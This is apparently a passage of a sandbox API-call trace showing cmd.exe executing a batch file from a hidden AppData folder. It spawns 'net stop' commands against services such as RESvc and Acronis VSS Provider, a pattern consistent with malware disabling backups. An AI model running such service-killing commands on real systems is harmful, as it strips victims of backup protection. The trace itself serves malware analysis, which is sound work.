[0217.894] GetProcessHeap () returned 0x3e0000 [0217.894] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0217.894] _get_osfhandle (_FileHandle=3) returned 0x74 [0217.894] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1781 [0217.894] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x140, lpOverlapped=0x0) returned 1 [0217.894] SetFilePointer (in: hFile=0x74, lDistanceToMove=6036, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1794 [0217.894] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=19, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop RESvc /y\r\nMCS AgentΓÇ¥ /y\r\n/y\r\n /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 19 [0217.895] _get_osfhandle (_FileHandle=3) returned 0x74 [0217.895] GetFileType (hFile=0x74) returned 0x1 [0217.895] _get_osfhandle (_FileHandle=3) returned 0x74 [0217.895] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1794 [0217.895] GetProcessHeap () returned 0x3e0000 [0217.895] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0217.895] GetProcessHeap () returned 0x3e0000 [0217.895] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0217.898] _tell (_FileHandle=3) returned 6036 [0217.898] _close (_FileHandle=3) returned 0 [0217.898] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0217.898] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0217.898] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0217.898] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0217.898] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0217.898] _wcsicmp (_String1="net", _String2="CD") returned 11 [0217.899] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0217.899] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0217.899] _wcsicmp (_String1="net", _String2="REN") returned -4 [0217.899] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0217.899] _wcsicmp (_String1="net", _String2="SET") returned -5 [0217.899] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0217.899] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0217.899] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0217.899] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0217.899] _wcsicmp (_String1="net", _String2="MD") returned 1 [0217.899] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0217.899] _wcsicmp (_String1="net", _String2="RD") returned -4 [0217.899] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0217.899] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0217.899] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0217.899] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0217.899] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0217.899] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0217.899] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0217.899] _wcsicmp (_String1="net", _String2="VER") returned -8 [0217.899] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0217.899] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0217.899] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0217.899] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0217.899] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0217.899] _wcsicmp (_String1="net", _String2="START") returned -5 [0217.899] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0217.899] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0217.899] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0217.899] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0217.899] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0217.899] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0217.899] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0217.899] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0217.899] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0217.899] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0217.900] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0217.900] SetErrorMode (uMode=0x0) returned 0x1 [0217.900] GetProcessHeap () returned 0x3e0000 [0217.900] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0217.900] GetProcessHeap () returned 0x3e0000 [0217.900] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0217.900] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0217.900] GetProcessHeap () returned 0x3e0000 [0217.900] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0217.900] GetProcessHeap () returned 0x3e0000 [0217.900] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0217.901] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0217.901] GetProcessHeap () returned 0x3e0000 [0217.901] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0217.901] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0217.901] GetProcessHeap () returned 0x3e0000 [0217.901] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0217.901] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0217.901] GetProcessHeap () returned 0x3e0000 [0217.901] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0217.902] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0217.902] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0217.902] GetLastError () returned 0x2 [0217.903] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0217.903] GetLastError () returned 0x2 [0217.903] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0217.904] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0217.904] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0217.904] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0217.904] GetLastError () returned 0x2 [0217.905] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0217.905] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0217.905] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.906] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0217.906] SetErrorMode (uMode=0x0) returned 0x1 [0217.906] GetProcessHeap () returned 0x3e0000 [0217.906] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0217.906] GetProcessHeap () returned 0x3e0000 [0217.906] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0217.906] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0217.906] GetProcessHeap () returned 0x3e0000 [0217.906] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0217.906] GetProcessHeap () returned 0x3e0000 [0217.906] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0217.907] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0217.907] GetProcessHeap () returned 0x3e0000 [0217.907] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0217.907] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0217.907] GetProcessHeap () returned 0x3e0000 [0217.907] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0217.907] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0217.907] GetProcessHeap () returned 0x3e0000 [0217.907] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0217.908] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0217.908] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0217.908] GetLastError () returned 0x2 [0217.909] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0217.909] GetLastError () returned 0x2 [0217.909] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0217.910] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0217.910] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0217.910] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0217.910] GetLastError () returned 0x2 [0217.911] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0217.911] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0217.911] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.911] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0217.911] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0217.911] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0217.912] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0217.912] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop RESvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop RESvc /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop RESvc /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x73c, dwThreadId=0x11c)) returned 1 [0217.916] CloseHandle (hObject=0x74) returned 1 [0217.916] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0217.916] GetProcessHeap () returned 0x3e0000 [0217.916] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0217.916] GetEnvironmentStringsW () returned 0x3f8408* [0217.916] GetProcessHeap () returned 0x3e0000 [0217.916] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0217.916] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0217.916] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0218.041] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0218.041] CloseHandle (hObject=0x78) returned 1 [0218.042] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0218.042] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0218.042] GetProcessHeap () returned 0x3e0000 [0218.042] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0218.042] GetEnvironmentStringsW () returned 0x3f8408* [0218.042] GetProcessHeap () returned 0x3e0000 [0218.042] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0218.042] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0218.042] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0218.042] GetProcessHeap () returned 0x3e0000 [0218.042] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0218.042] GetEnvironmentStringsW () returned 0x3f8408* [0218.042] GetProcessHeap () returned 0x3e0000 [0218.042] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0218.042] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0218.042] GetProcessHeap () returned 0x3e0000 [0218.043] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0218.043] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0218.043] _get_osfhandle (_FileHandle=1) returned 0x264 [0218.043] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0218.043] _get_osfhandle (_FileHandle=1) returned 0x264 [0218.043] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0218.043] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0218.043] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0218.043] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0218.043] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0218.044] SetConsoleInputExeNameW () returned 0x1 [0218.044] GetConsoleOutputCP () returned 0x1b5 [0218.044] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0218.044] SetThreadUILanguage (LangId=0x0) returned 0x409 [0218.044] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0218.044] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0218.044] _get_osfhandle (_FileHandle=3) returned 0x78 [0218.044] SetFilePointer (in: hFile=0x78, lDistanceToMove=6036, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1794 [0218.044] GetProcessHeap () returned 0x3e0000 [0218.044] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0218.044] GetProcessHeap () returned 0x3e0000 [0218.044] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0218.044] GetProcessHeap () returned 0x3e0000 [0218.044] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0218.044] GetProcessHeap () returned 0x3e0000 [0218.044] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0218.044] GetProcessHeap () returned 0x3e0000 [0218.045] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0218.045] GetProcessHeap () returned 0x3e0000 [0218.045] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0218.045] GetProcessHeap () returned 0x3e0000 [0218.045] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0218.045] GetProcessHeap () returned 0x3e0000 [0218.045] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0218.045] GetProcessHeap () returned 0x3e0000 [0218.045] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0218.045] GetProcessHeap () returned 0x3e0000 [0218.045] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0218.045] GetProcessHeap () returned 0x3e0000 [0218.045] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ef4b0 | out: hHeap=0x3e0000) returned 1 [0218.045] GetProcessHeap () returned 0x3e0000 [0218.045] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0218.045] GetProcessHeap () returned 0x3e0000 [0218.045] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0218.045] _get_osfhandle (_FileHandle=3) returned 0x78 [0218.045] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1794 [0218.045] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x12d, lpOverlapped=0x0) returned 1 [0218.045] SetFilePointer (in: hFile=0x78, lDistanceToMove=6076, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x17bc [0218.045] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=40, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop ΓÇ£Acronis VSS ProviderΓÇ¥ /y\r\n /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 40 [0218.046] _get_osfhandle (_FileHandle=3) returned 0x78 [0218.046] GetFileType (hFile=0x78) returned 0x1 [0218.046] _get_osfhandle (_FileHandle=3) returned 0x78 [0218.046] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x17bc [0218.046] GetProcessHeap () returned 0x3e0000 [0218.046] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0218.046] GetProcessHeap () returned 0x3e0000 [0218.046] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0218.049] _tell (_FileHandle=3) returned 6076 [0218.049] _close (_FileHandle=3) returned 0 [0218.049] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0218.049] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0218.049] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0218.049] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0218.049] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0218.049] _wcsicmp (_String1="net", _String2="CD") returned 11 [0218.049] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0218.049] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0218.050] _wcsicmp (_String1="net", _String2="REN") returned -4 [0218.050] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0218.050] _wcsicmp (_String1="net", _String2="SET") returned -5 [0218.050] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0218.050] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0218.050] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0218.050] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0218.050] _wcsicmp (_String1="net", _String2="MD") returned 1 [0218.050] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0218.050] _wcsicmp (_String1="net", _String2="RD") returned -4 [0218.050] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0218.050] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0218.050] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0218.050] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0218.050] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0218.050] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0218.050] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0218.050] _wcsicmp (_String1="net", _String2="VER") returned -8 [0218.050] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0218.050] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0218.050] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0218.050] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0218.050] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0218.050] _wcsicmp (_String1="net", _String2="START") returned -5 [0218.050] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0218.050] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0218.050] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0218.050] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0218.050] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0218.050] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0218.050] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0218.050] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0218.050] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0218.050] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0218.051] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0218.051] SetErrorMode (uMode=0x0) returned 0x1 [0218.051] GetProcessHeap () returned 0x3e0000 [0218.051] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0218.051] GetProcessHeap () returned 0x3e0000 [0218.051] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0218.051] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0218.051] GetProcessHeap () returned 0x3e0000 [0218.051] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0218.051] GetProcessHeap () returned 0x3e0000 [0218.051] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0218.052] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0218.052] GetProcessHeap () returned 0x3e0000 [0218.052] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0218.052] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0218.052] GetProcessHeap () returned 0x3e0000 [0218.052] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0218.052] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0218.052] GetProcessHeap () returned 0x3e0000 [0218.052] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0218.053] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0218.053] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0218.053] GetLastError () returned 0x2 [0218.054] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0218.054] GetLastError () returned 0x2 [0218.054] GetDriveTypeW 